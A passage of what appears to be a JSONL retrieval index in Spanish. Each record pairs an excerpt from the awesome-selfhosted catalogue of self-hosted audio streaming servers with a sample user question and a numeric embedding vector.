0.00635, -0.01719, -0.05164, -0.02935, 0.00717, 0.04438, -0.04974, -0.07235, 0.07226, 0.07517, -0.04167, 0.0309, 0.03063, 0.00446, -0.03491, -0.06506, -0.04409, 0.00927, -0.03185, 0.00047, -0.03623, -0.02892, 0.0246, 0.10225, 0.09286, 0.01842, -0.09225, 0.06856, -0.06849, -0.04326, 0.06179, 0.05612, -0.05663, -0.03596, 0.0545, 0.01686, 0.00398, 0.01614, 0.00249, -0.01464, 0.03581, -0.01531, -0.02425, 0.08787, 0.04036, -0.02061, 0.00432, -0.0343, -0.00046, 0.01468, -0.00789, 0.02703, 0.00502, -0.0492, -0.03304, 0.00407, 0.1142, -0.02569, -0.01854, 0.02957, -0.09525, 0.01075, 0.03185, -0.04573, -0.02392, -0.03375, -0.06256, 0.01267, -0.05365, 0.03252, -0.00423]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: koel β€” Personal music streaming server that works [MIT, PHP]. LibreTime β€” Broadcast streaming radio on the web (fork of [Airtime](https://github.com/sourcefabric/Airtime)) [AGPL-3.0, Docker/PHP]. LMS β€” Access your self-hosted music using a web interface [GPL-3.0, Docker/deb/C++]. Lyrion Music Server β€” Server software which controls a wide range of Squeezebox/Slim Devices audio players and compatible hardware (formerly Logitech Media Server) [GPL-2.0, deb/Docker/Perl]. moOde Audio β€” Audiophile-quality music playback for the wonderful Raspberry Pi family of single board computers [GPL-3.0, PHP]. Mopidy β€” Extensible music server. Offers a superset of the mpd API, as well as integration with 3rd party services like Spotify, SoundCloud etc [⚠, Apache-2.0, Python/deb]. mpd β€” Daemon to remotely play music, stream music, handle and organize playlists. Many clients available [GPL-2.0, C++]. mStream β€” Music streaming server with GUI management tools. Runs on Mac, Windows, and Linux [GPL-3.0, Nodejs].", "indexar": "cuΓ‘l es una alternativa libre a Logitech Media Server?", "v": [-0.10049, 0.02705, -0.03966, -0.07832, -0.09703, -0.11232, -0.05489, -0.06171, -0.14986, -0.06329, -0.10359, -0.13452, 0.01113, 0.03941, 0.17617, 0.03488, 0.06385, -0.17714, -0.02044, -0.09094, -0.00456, 0.03486, -0.13741, -0.16868, 0.13823, -0.07378, 0.15388, -0.11343, -0.04777, 0.04519, -0.10069, 0.00858, 0.03796, 0.06772, -0.01876, 0.04881, 0.15788, 0.10598, 0.08179, 0.01241, -0.01112, -0.13087, -0.00579, -0.02127, 0.16759, -0.08993, -0.00157, -0.02786, -0.01756, -0.00293, 0.04065, -0.0504, -0.00288, 0.02626, 0.04222, -0.02619, 0.07707, -0.08706, -0.02788, -0.0203, -0.10609, 0.03737, -0.00669, 0.02618, -0.00115, 0.1212, -0.07177, -0.07029, -0.06877, 0.07068, -0.0709, -0.09438, 0.07642, -0.08583, -0.07264, 0.08686, -0.09098, -0.00523, 0.07585, 0.06366, 0.08832, -0.0824, -0.00948, -0.00751, -0.03123, -0.1054, 0.08596, -0.0352, -0.05288, 0.02114, 0.06526, 0.11088, -0.00249, 0.07909, 0.0227, -0.0361, 0.07624, -0.02082, -0.01896, -0.02433, -0.00641, -0.01882, -0.07411, -0.0313, 0.00279, -0.06388, 0.00899, -0.0477, -0.09385, -0.02626, 0.06325, 0.13064, 0.01546, 0.02766, -0.14155, 0.01495, 0.02676, 0.02798, 0.03566, 0.09102, 0.02882, -0.05408, 0.02296, -0.06277, -0.00725, 0.05281, 0.05706, -0.03576, -0.04713, 0.02011, -0.01754, -0.03561, 0.00775, -0.0669, -0.0781, -0.09037, 0.06871, -0.05288, -0.02882, 0.03278, -0.00029, 0.0418, -0.00977, -0.01017, 0.11999, -0.02443, 0.10693, -0.02208, -0.06021, 0.00431, 0.01011, -0.00477, -0.03831, 0.02935, -0.06488, -0.04047, -0.04696, -0.09967, -0.09366, 0.08637, 0.01963, -0.01201, -0.02756, 0.0661, 0.01081, -0.03714, -0.03928, -0.1015, -0.05333, 0.04397, -0.03275, 0.09409, 0.06747, -0.08751, 0.02307, -0.07863, -0.01622, -0.0752, 0.03226, -0.05032, -0.01086, 0.01426, -0.06277, 0.00769, 0.04392, 0.01343, -0.01569, -0.02236, 0.0471, 0.05992, -0.01829, 0.0124, -0.09862, -0.08947, 0.07206, -0.03351, -2e-05, -0.09677, -0.02275, 0.03944, -0.05664, 0.03448, -0.0201, 0.03138, -0.01147, 0.0639, 0.01072, 0.01459, 0.00182, 0.07897, 0.00752, 0.00461, 0.08649, -0.00574, -0.03794, 0.01183, 0.03679, -0.02852, 0.03063, -0.00603, 0.01168, 0.0658, -0.0814, -0.03172, -0.06806, 0.04608, 0.04101, 0.06269, -0.02576, -0.04375, -0.01578, -0.01414, -0.00504, 0.05437, -0.02254, -0.00907, 0.03405, 0.02535, 0.04461, -0.00521, 0.01121, 0.01242, -0.04976, 0.01244, -0.05214, -0.04276, -0.10148, 0.00805, -0.05134, -0.01766, -0.00232, 0.01396, -0.00845, -0.02111, -0.00309, -0.0015]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: multi-scrobbler β€” Scrobble plays from multiple sources to multiple scrobbling services [MIT, Nodejs/Docker]. musikcube β€” Streaming audio server with Linux/macOS/Windows/Android clients [BSD-3-Clause, C++/deb]. Navidrome Music Server β€” Modern Music Server and Streamer, compatible with Subsonic/Airsonic [GPL-3.0, Docker/Go]. Pinepods β€” Podcast management system with multi-user support. Pinepods utilizes a central database so aspects like listen time and themes follow from device to device [GPL-3.0, Docker]. Polaris β€” Music browsing and streaming application optimized for large music collections, ease of use and high performance [MIT, Rust/Docker]. Snapcast β€” Synchronous multiroom audio server [GPL-3.0, C++/deb]. Stretto β€” Music player with Youtube/Soundcloud import and iTunes/Spotify discovery [⚠, MIT, Nodejs]. Supysonic β€” Python implementation of the Subsonic server API [AGPL-3.0, Python/deb].", "indexar": "con que programa puedo escuchar mΓΊsica en casa sin internet?", "v": [-0.01049, 0.14487, -0.04845, -0.08699, -0.11774, -0.07002, -0.14566, -0.00835, -0.02657, -0.08815, 0.01163, -0.02251, 0.04683, -0.05408, 0.00971, -0.00558, 0.10788, 0.03129, 0.07142, -0.02072, 0.00474, 0.02633, -0.10009, 0.01936, -0.07061, -0.01834, 0.08142, 0.04276, -0.0083, 0.0853, -0.02721, -0.00179, 0.05522, -0.04382, -0.09487, -0.02645, 0.11005, 0.16169, 0.08769, -0.03203, 0.0132, 0.01835, -0.03101, 0.01538, 0.06678, -0.04462, 0.04998, -0.02312, 0.00158, 0.00299, -0.03168, 0.03246, -0.00445, 0.02199, 0.08561, -0.1021, 0.00357, -0.19052, 0.02442, -0.0449, -0.0601, -0.02277, 0.05808, 0.03114, 0.07735, 0.10498, 0.0955, 0.07263, 0.0407, 0.06315, -0.01892, 0.04064, 0.02751, -0.01621, 0.02907, 0.03416, -0.06325, -0.12365, 0.00538, -0.05968, -0.02843, -0.03585, 0.01822, 0.02446, -0.09051, 0.05382, 0.08823, -0.08131, -0.06248, -0.00917, -0.02053, 0.11066, 0.0076, 0.06827, 0.09555, -0.06913, 0.11626, 0.01989, 0.03788, -0.05664, 0.039, 0.01412, -0.07243, 0.04812, 0.0361, 0.07807, 0.11029, -0.03998, 0.00207, 0.03286, -0.08116, 0.0727, -0.04289, -0.04455, -0.00726, -0.10226, -0.02172, -0.03349, 0.04211, 0.01332, -0.01611, 0.0518, -0.01499, -0.01099, -0.02559, -0.03733, 0.06512, 0.02582, 0.0315, 0.03315, 0.02936, -0.06485, 0.06106, -0.11343, 0.0621, -0.06573, -0.0994, -0.11256, 0.03772, -0.00614, 0.13275, 0.05788, -0.04825, 0.01501, 0.06045, -0.05879, -0.02187, -0.0297, -0.07503, -0.01355, -0.08554, 0.1553, -0.12988, -0.02623, -0.01492, 0.04447, 0.03238, -0.01262, -0.03448, -0.03856, -0.10489, 0.04542, -0.01038, -0.08155, -0.00716, 0.07013, 0.02744, 0.12305, 0.02713, -0.00478, -0.15352, 0.00028, 0.06868, -0.07258, -0.17508, -0.0816, -0.05058, -0.04345, 0.09179, -0.02838, -0.14347, 0.02607, -0.05968, -0.0686, -0.02192, 0.02792, -0.03047, -0.02404, -0.10278, -0.05435, -0.06095, -0.06137, -0.06482, 0.11927, 0.06527, -0.01131, -0.06635, 0.02704, -0.0368, 0.04329, -0.13032, -0.10722, 0.00719, -0.0422, 0.05529, 0.05614, 0.0142, -0.04457, 0.03669, 0.06811, -0.02249, -0.10394, -0.02928, 0.04036, -0.03747, -0.00701, -0.01253, 0.00391, 0.00078, 0.11616, -0.02207, 0.0621, 0.05716, 0.04214, 0.01699, 0.02383, 0.03848, -0.05052, 0.07065, 0.02687, -0.05027, -0.04799, 0.02014, 0.006, -0.0421, -0.01173, -0.08187, -0.00602, -0.07267, 0.01359, -0.03058, 0.06733, 0.03023, -0.01035, 0.0459, -0.04865, -0.02732, 0.01719, 0.02152, 0.0062, -0.05255, 0.02868, 0.03324, 0.01489, 0.07291, 0.09519]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: multi-scrobbler β€” Scrobble plays from multiple sources to multiple scrobbling services [MIT, Nodejs/Docker]. musikcube β€” Streaming audio server with Linux/macOS/Windows/Android clients [BSD-3-Clause, C++/deb]. Navidrome Music Server β€” Modern Music Server and Streamer, compatible with Subsonic/Airsonic [GPL-3.0, Docker/Go]. Pinepods β€” Podcast management system with multi-user support. Pinepods utilizes a central database so aspects like listen time and themes follow from device to device [GPL-3.0, Docker]. Polaris β€” Music browsing and streaming application optimized for large music collections, ease of use and high performance [MIT, Rust/Docker]. Snapcast β€” Synchronous multiroom audio server [GPL-3.0, C++/deb]. Stretto β€” Music player with Youtube/Soundcloud import and iTunes/Spotify discovery [⚠, MIT, Nodejs]. Supysonic β€” Python implementation of the Subsonic server API [AGPL-3.0, Python/deb].", "indexar": "cual es la mejor alternativa gratuita a Spotify para gestionar mi biblioteca local?", "v": [-0.05411, 0.03583, -0.19496, -0.13533, -0.07075, -0.16779, -0.11374, -0.14393, -0.13266, -0.09122, -0.02818, -0.11084, 0.0691, -0.02638, 0.02275, -0.10684, 0.0946, -0.09996, 0.08401, -0.02883, 0.02629, 0.07697, -0.02275, -0.00737, 0.07587, -0.10035, 0.12974, 0.03187, -0.10099, 0.12623, 0.04208, -0.05181, -0.01601, -0.06211, -0.07404, 0.06523, 0.11282, 0.0603, 0.04698, -0.1137, 0.07683, -0.00483, 0.0612, 0.0933, -0.06153, -0.02357, 0.0496, 0.01218, 0.02448, 0.1159, -0.04255, -0.02421, -0.01181, 0.09051, 0.04226, 0.03469, 0.00983, -0.23014, -0.04054, -0.09974, -0.10855, 0.00189, -0.11665, -0.03411, 0.06308, 0.02856, 0.02356, 0.06209, -0.07896, 0.15108, -0.04155, -0.01286, 0.05426, 0.00371, -0.05327, 0.08727, 0.01343, -0.08658, 0.07613, -0.01694, 0.09779, -0.05983, 0.05433, -0.00718, -0.10932, 0.01351, 0.00561, -0.0828, 0.04843, 0.10148, -0.11122, -0.05841, -0.05242, 0.06399, 0.00648, -0.06636, 0.06948, -0.04674, -0.01045, 0.04143, 0.0263, 0.00069, -0.05427, 0.06256, 0.02566, -0.02515, -0.10959, -0.02442, 0.0355, -0.01457, 0.00195, -0.00119, 0.00938, 0.04646, -0.01041, -0.00471, 0.0254, 0.00639, 0.07064, 0.06681, -0.10636, -0.05753, -0.08815, -0.12796, 0.02621, 0.10429, 0.09346, 0.02041, 0.00682, 0.03474, 0.04633, -0.03557, -0.02131, -0.08933, -0.08523, -0.031, 0.00749, -0.12252, -0.02825, -0.01577, -0.01067, -0.01767, -0.05132, -0.00116, 0.0104, -0.1426, 0.03995, 0.01919, 0.07004, -0.03841, -0.05665, -0.00684, -0.02035, 0.03759, 0.0051, 0.07999, 0.06212, -0.07091, -0.10434, 0.03853, 0.03293, -0.06845, 0.00195, 0.00789, -0.08762, -0.02878, 0.06856, 0.03278, 0.00832, -0.00787, -0.07496, 0.05896, 0.00279, -0.01078, -0.04176, -0.09555, 0.04361, -0.07035, 0.11207, 0.056, -0.04202, 0.01342, -0.03791, -0.0341, -0.06631, -0.06733, -0.03802, -0.01641, -0.08282, -0.00923, -0.03174, -0.00484, -0.00212, -0.00713, 0.05424, -0.02673, -0.01468, -0.04136, -0.09357, 0.03546, -0.01957, -0.00059, -0.06395, 0.06842, 0.0319, -0.02003, -0.01418, 0.06355, 0.01581, -0.03979, 5e-05, 0.07271, 0.012, 0.01345, -0.0429, -0.047, -0.02946, -0.04247, 0.01044, -0.05386, -0.00709, -0.0032, 0.06468, -0.01825, -0.00797, 0.00905, 0.02753, 0.00831, -0.01112, 0.03758, -0.00616, -0.01361, 0.04652, 0.04456, 0.02127, -0.05399, 0.01827, 0.026, 0.00871, -0.04126, -0.00599, 0.09126, -0.02133, 0.00553, -0.04078, -0.01547, -0.1057, -0.00417, -0.0181, -0.02766, -0.01483, -0.00202, 0.04023, 0.02103, 0.06036, 0.0064]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: multi-scrobbler β€” Scrobble plays from multiple sources to multiple scrobbling services [MIT, Nodejs/Docker]. musikcube β€” Streaming audio server with Linux/macOS/Windows/Android clients [BSD-3-Clause, C++/deb]. Navidrome Music Server β€” Modern Music Server and Streamer, compatible with Subsonic/Airsonic [GPL-3.0, Docker/Go]. Pinepods β€” Podcast management system with multi-user support. Pinepods utilizes a central database so aspects like listen time and themes follow from device to device [GPL-3.0, Docker]. Polaris β€” Music browsing and streaming application optimized for large music collections, ease of use and high performance [MIT, Rust/Docker]. Snapcast β€” Synchronous multiroom audio server [GPL-3.0, C++/deb]. Stretto β€” Music player with Youtube/Soundcloud import and iTunes/Spotify discovery [⚠, MIT, Nodejs]. Supysonic β€” Python implementation of the Subsonic server API [AGPL-3.0, Python/deb].", "indexar": "que herramienta sirve para transmitir audio desde varios dispositivos a un mismo altavoz?", "v": [0.03258, 0.15281, -0.23111, -0.17734, 0.01955, -0.08479, -0.09904, -0.0817, -0.03132, -0.06709, -0.0789, -0.10937, -0.04122, 0.01329, 0.16777, -0.04092, 0.14653, -0.07562, 0.01916, 0.03772, 0.07781, 0.01154, -0.08159, -0.08081, -0.04883, 0.05884, 0.10353, 0.00314, -0.17211, 0.04829, 0.01774, 0.00155, 0.0213, -0.06672, -0.11164, -0.13327, -0.07879, 0.13801, -0.02963, 0.07745, -0.0311, 0.02171, -0.01213, 0.00854, 0.01623, 0.00984, -0.06078, -0.01907, -0.0038, 0.12565, -0.06407, -0.06054, -0.07395, 0.0291, -0.06815, -0.13091, 0.14927, -0.16571, 0.04662, -0.17208, -0.04106, -0.09322, -0.04114, -0.08396, 0.01842, 0.05734, -0.03834, -0.04434, -0.08191, 0.01954, -0.0414, -0.00424, 0.07068, 0.0782, 0.02519, 0.0692, -0.08935, -0.03328, 0.04161, -0.02934, 0.07694, -0.08836, -0.01914, -0.05429, -0.08005, 0.02964, 0.10878, 0.01472, 0.0291, -0.04826, -0.05358, 0.04751, 0.03395, -0.10645, 0.04209, -0.03795, 0.07011, -0.05431, -0.02457, -0.04938, 0.14532, 0.00122, -0.06346, 0.02673, -0.039, 0.00996, -0.00726, -0.1677, 0.05719, -0.00975, -0.01392, 0.02979, 0.06449, -0.01663, -0.06292, -0.0049, 0.05125, -0.08514, 0.02756, 0.07131, -0.01026, 0.05806, 0.01106, 0.02426, 0.03105, 0.01305, -0.02026, -0.04903, 0.03032, 0.00824, 0.089, -0.04413, 0.05201, -0.02523, -0.00384, -0.08131, 0.01212, -0.07757, -0.01401, -0.05869, 0.08578, 0.07818, -0.03413, -0.09428, 0.05072, 0.00385, 0.02402, -0.02528, -0.01549, -0.00108, -0.00844, -0.00773, -0.06168, -0.03779, -0.01543, 0.03382, 0.01907, -0.04499, -0.1106, 0.0815, -0.05354, -0.04045, 0.04613, -0.00677, 0.02192, -0.05231, 0.00245, 0.01988, 0.09692, 0.0231, -0.04302, 0.00947, 0.11731, -0.06368, -0.06638, -0.02435, -0.04655, 0.0069, 0.08878, -0.08193, -0.03971, 0.04315, -0.02661, -0.0262, 0.07149, -0.01339, -0.00463, -0.05859, -0.05217, -0.01616, -0.02327, 0.01738, -0.00797, -0.00665, 0.0899, -8e-05, -0.10913, -0.0821, -0.03825, 0.05634, -0.07546, -0.01833, 0.04358, -0.06734, 0.04547, 0.03205, -0.00473, -0.02428, 0.0162, 0.09665, 0.01746, -0.00021, 0.01221, 0.04188, -0.00789, 0.02308, -0.02283, 0.04279, -0.04714, 0.01784, 0.05875, -0.00196, 0.05244, -0.03071, 0.00616, 0.05161, -0.00337, -0.0245, 0.01794, -0.04856, 0.04485, -0.00228, 0.01304, 0.04129, 0.00763, -0.00637, 0.0075, 0.0085, -0.06297, -0.02731, -0.05754, 0.05716, -0.0074, -0.00229, -0.03875, -0.02741, 0.0067, -0.01843, -0.00401, -0.11362, -0.01152, 0.03726, 0.05145, 0.00859, 0.02568, -0.03567]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: SwingMusic β€” Swing Music is a beautiful, self-hosted music player and streaming server for your local audio files. Like a cooler Spotify ... but bring your own music [MIT, Python/Docker]. vod2pod-rss β€” Convert YouTube and Twitch channels to podcasts, no storage required. Transcodes VoDs to MP3 192k on the fly, generates an RSS feed to use in podcast clients [⚠, MIT, Docker].", "indexar": "que programa puedo usar para transmitir mΓΊsica desde mi ordenador local?", "v": [-0.03147, 0.13346, -0.08701, -0.21351, -0.08301, -0.11125, -0.11742, 0.00285, -0.10493, -0.10164, -0.03229, -0.0256, 0.02755, -0.04595, 0.02044, -0.08988, 0.13448, -0.03796, 0.07538, 0.00928, 0.03908, -0.00557, -0.08168, -0.07027, 0.00836, 0.08465, 0.04057, -0.02661, -0.0543, -0.02659, 0.01279, 0.00163, 0.04373, -0.08998, -0.06493, -0.07356, 0.0982, 0.0456, 0.07409, -0.03874, 0.02288, -0.0086, 0.01396, 0.06883, 0.14046, -0.04903, 0.06243, -0.08661, -0.00611, 0.01828, -0.00046, -0.03927, -0.03201, -0.03474, 0.04321, -0.18248, -0.02798, -0.18933, 0.01884, -0.03541, 0.00851, 0.01315, -0.06185, 0.01641, 0.06641, 0.0325, 0.05992, 0.03132, -0.09855, 0.06802, -0.10555, 0.03957, 0.07371, -0.01048, -0.03547, 0.05813, -0.05757, -0.11268, 0.12213, -0.08357, -0.00735, -0.01598, 0.04343, 0.0288, -0.11664, 0.01614, 0.14594, -0.05778, 0.00235, 0.00223, -0.0177, 0.03886, 0.01892, 0.03483, 0.11424, -0.05159, 0.07246, 0.07543, -0.0028, 0.02535, 0.07438, -0.07632, -0.04929, 0.09847, -0.01611, 0.0508, 0.11455, -0.07265, 0.06243, 0.06715, -0.02069, 0.02228, -0.05063, -0.03726, -0.07076, -0.03033, 0.06716, -0.0317, -0.03201, 0.06428, -0.02507, 0.05949, 0.02805, 0.01575, 0.03221, 0.01151, 0.00633, 0.08027, -0.08437, 0.07225, 0.01671, -0.04335, 0.06525, -0.07188, -0.01227, -0.05434, -0.00044, -0.1294, 0.04901, -0.01649, 0.07036, 0.11265, -0.04783, 0.02941, 0.01661, 0.03641, 0.00116, -0.06104, -0.05093, -0.01693, 0.01114, 0.04738, -0.09958, -0.02574, -0.03825, 0.07471, 0.12963, 0.02184, -0.09767, -0.02347, -0.07789, 0.07303, 0.00902, -0.03752, 0.04722, -0.06398, 0.03082, 0.09098, 0.04907, 0.05296, -0.12991, 0.09132, 0.08464, -0.09611, -0.0689, -0.05355, -0.01854, -0.05498, 0.05298, 0.01977, -0.05602, 0.11391, 0.00501, 0.05159, 0.02398, 0.02052, -0.03853, 0.02609, -0.06686, -0.0452, -0.03668, -0.03075, 0.0122, 0.02436, 0.08302, 0.02295, -0.09326, 0.01585, -0.04937, 0.02836, -0.11936, -0.04784, -0.08426, -0.01577, 0.09769, 0.06955, -0.04875, -0.04034, 0.0216, 0.09245, -0.04174, -0.07331, -0.02502, 0.08522, -0.03655, -0.00859, -0.00255, 0.00022, 0.01605, 0.05899, 0.02001, 0.01707, 0.05718, 0.02113, 0.0039, -0.04495, 0.02233, -0.03826, 0.06526, 0.00717, 0.00064, 0.01549, -0.00118, 0.00531, -0.06043, -0.03334, -0.06532, -0.00715, -0.05171, -0.00211, -0.03395, 0.09905, 0.01112, -0.07878, -0.03405, 0.01881, -0.09114, -0.01151, -0.02211, -0.01523, -0.02045, -0.02423, 0.03605, 0.00165, 0.02332, 0.11892]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: SwingMusic β€” Swing Music is a beautiful, self-hosted music player and streaming server for your local audio files. Like a cooler Spotify ... but bring your own music [MIT, Python/Docker]. vod2pod-rss β€” Convert YouTube and Twitch channels to podcasts, no storage required. Transcodes VoDs to MP3 192k on the fly, generates an RSS feed to use in podcast clients [⚠, MIT, Docker].", "indexar": "cual es una alternativa libre a Spotify para reproducir mis propios archivos de audio?", "v": [0.03708, 0.04083, -0.10319, -0.09386, -0.042, -0.11514, -0.09768, -0.18006, -0.10152, -0.04391, -0.01033, -0.13554, 0.03139, -0.0142, 0.0683, -0.12948, 0.12411, -0.04598, 0.08646, 0.01702, -0.01779, 0.03723, -0.07206, -0.12042, 0.08477, -0.05166, 0.12814, 0.10604, -0.16098, 0.04492, -0.01477, 0.03483, 0.04166, -0.05277, -0.15213, 0.04476, 0.08617, 0.13522, 0.0073, -0.00963, 0.07088, -0.07748, -0.03421, 0.12393, -0.12345, -0.0331, -0.01007, 0.02479, 0.008, 0.11545, 0.063, 0.05298, -0.07291, 0.12757, 0.03542, -0.03202, 0.01189, -0.22999, -0.0288, -0.06118, -0.0795, 0.03556, -0.02392, -0.04736, -0.04139, 0.07418, -0.01049, 0.04268, -0.04224, 0.17692, -0.02572, -0.01456, 0.04561, 0.00387, -0.00075, 0.10552, -0.09207, -0.20042, -0.02402, -0.0448, 0.07932, -0.16608, 0.03826, -0.02253, -0.04436, -0.00084, 0.06851, 0.01618, -0.01613, 0.06956, -0.07906, -0.00345, 0.00655, 0.09344, 0.00275, -0.07079, 0.11178, -0.04651, -0.03523, -0.03272, 0.01445, 0.04701, -0.04788, 0.02542, 0.04157, 0.04999, -0.03378, -0.04883, 0.04955, 0.03609, -0.02651, 0.04729, -0.02231, 0.07591, -0.07821, -0.03082, -0.03181, -0.01221, 0.06548, 0.03723, -0.01785, 0.01646, -0.03314, -0.08129, -0.05791, 0.03702, 0.01365, 0.01952, -0.03458, 0.0188, 0.13402, 0.02043, -0.03013, -0.10783, -0.04735, -0.07376, 0.05601, -0.01107, 0.02485, 0.0157, 0.09813, 0.00893, -0.04084, 0.00621, 0.06699, -0.0514, 0.00558, -0.04313, 0.04862, -0.06538, -0.11105, 0.06988, -0.07757, -0.01694, -0.01639, 0.0584, 0.01773, -0.10016, -0.05547, 0.03399, -0.00244, -0.03562, -0.04108, 0.01185, 0.02139, 0.00269, 0.06581, 0.00311, -0.01406, -0.07953, -0.06559, 0.00653, 0.07087, -0.08846, -0.05065, -0.07407, 0.00147, -0.09164, 0.14258, -0.02063, -0.03868, 0.01471, -0.08034, -0.02592, -0.00161, -0.03214, -0.00114, -0.03926, -0.08279, 0.05616, -0.03877, -0.01325, -0.0354, 0.01054, 0.03273, -0.01169, -0.06528, -0.05215, -0.14266, 0.04009, -0.03355, -0.02169, -0.04003, 0.01722, 0.05808, -0.04914, -0.03158, -0.00542, 0.04831, 0.01635, 0.03752, 0.03468, 0.05353, 0.05817, -0.05254, -0.00467, -0.00388, -0.0241, 0.01424, 0.02082, 0.01983, 0.05569, 0.07156, 0.00208, -0.03664, 0.03776, 0.01182, -0.00931, -0.00507, 0.01333, -0.00598, 0.03614, 0.00777, 0.03398, 0.02126, 0.0051, -0.04837, 0.0223, -0.01191, -0.01866, 0.00896, 0.05774, -0.02361, 0.03581, -0.01078, -0.02183, -0.02992, 0.00754, -0.0022, -0.01967, 0.00057, 0.05596, 0.04362, 0.00075, 0.05068, -0.01065]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Audio Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Audio Streaming", "tema": "media streaming - audio streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Audio Streaming: SwingMusic β€” Swing Music is a beautiful, self-hosted music player and streaming server for your local audio files. Like a cooler Spotify ... but bring your own music [MIT, Python/Docker]. vod2pod-rss β€” Convert YouTube and Twitch channels to podcasts, no storage required. Transcodes VoDs to MP3 192k on the fly, generates an RSS feed to use in podcast clients [⚠, MIT, Docker].", "indexar": "con que herramienta puedo convertir videos de YouTube en podcasts sin necesidad de guardarlos?", "v": [0.04832, 0.03167, -0.10316, -0.15445, -0.02927, -0.0297, -0.02181, -0.01248, 0.07648, -0.16307, -0.08237, -0.05485, -0.02705, 0.00521, -0.11182, -0.00217, 0.16888, -0.03889, 0.05499, 0.01012, 0.08028, -0.00202, -0.07698, -0.05528, 0.06106, 0.02173, 0.03862, 0.01796, -0.11391, 0.01515, -0.11228, 0.05038, -0.06362, 0.00889, -0.20628, -0.0167, 0.02748, 0.13609, -0.12275, 0.01979, -0.06393, 0.09779, -0.02906, 0.09017, -0.08247, 0.01704, 0.00417, 0.01247, -0.07746, 0.05474, 0.02726, -0.05671, -0.13918, 0.0543, -0.01386, -0.12957, 0.07819, -0.1656, -0.04323, -0.03322, -0.1266, -0.0047, 0.05452, -0.00751, 0.01041, 0.04017, -0.06274, 0.08131, -0.08969, 0.09278, -0.18131, -0.02798, -0.01897, 0.02611, 0.08625, 0.05846, 0.0192, 0.0076, -0.02795, 0.06468, 0.03377, -0.12324, 0.04919, 0.03295, -0.047, -0.00152, 0.04499, -0.02068, 0.00391, -0.14072, -0.05167, 0.10203, 0.04776, 0.00278, 0.00312, -0.02196, 0.11273, -0.01181, -0.01675, -0.13131, 0.00121, 0.00947, -0.04538, 0.07596, 0.05524, 0.13768, -0.00302, -0.10076, -0.02881, 0.097, 0.07502, 0.06017, 0.0132, -0.05135, -0.06739, 0.04008, -0.02155, -0.1365, -0.0117, -0.01112, 0.09649, 0.0136, -0.11448, -0.07361, 0.02268, 0.0409, -0.022, 0.0517, 0.02226, -0.01574, 0.06017, -0.05758, -0.02185, -0.03971, 0.06091, -0.06916, 0.05113, -0.0227, -0.07534, -0.0384, 0.03365, -0.0004, 0.00517, -0.07704, 0.0643, -0.0807, -0.00595, -0.10508, -0.11089, -0.0606, 0.01953, -0.01007, -0.11774, -0.06731, 0.00842, 0.01336, 0.00333, -0.14331, -0.08022, -0.00659, 0.04577, -0.05512, 0.02002, -0.09331, -0.02785, -0.01636, 0.02959, 0.05023, 0.00123, -0.00319, -0.00466, 0.02015, 0.03958, -0.07184, -0.05369, -0.07545, -0.03313, 0.0112, 0.10955, -0.06604, -0.11759, 0.01505, -0.00668, -0.00908, -0.00872, -0.06707, 0.00397, -0.00059, -0.05774, 0.06719, -0.05538, 0.00789, -0.02254, -0.02818, 0.06716, 0.0035, -0.04453, -0.04862, -0.01289, 0.0583, -0.07095, -0.06367, 0.00326, 0.00676, -0.02287, 0.01471, -0.0595, -0.03362, 0.01374, 0.00379, 0.02305, -0.0635, -0.02938, -0.00534, 0.0117, -0.0513, 0.02661, 0.07782, -0.0268, 0.05641, 0.0449, 0.02903, 0.04655, -0.07422, -0.00458, 0.07303, 0.03718, 0.01972, -0.02813, -0.01485, -0.05555, -0.01925, -0.01801, 0.0016, 0.04801, 0.00387, -0.00752, 0.02304, -0.07773, 0.01146, -0.02556, 0.08888, 0.01779, 0.02582, -0.01152, -0.0187, -0.03846, 0.06794, 0.03084, -0.08437, -0.01468, 0.03041, 0.06469, -0.003, 0.01576, -0.01891]} +{"tipo": "pregunta", "herramienta": "Media Streaming - Multimedia Streaming", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Media Streaming - Multimedia Streaming", "tema": "media streaming - multimedia streaming", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Media Streaming - Multimedia Streaming: ClipBucket β€” Start your own video sharing website (YouTube/Netflix 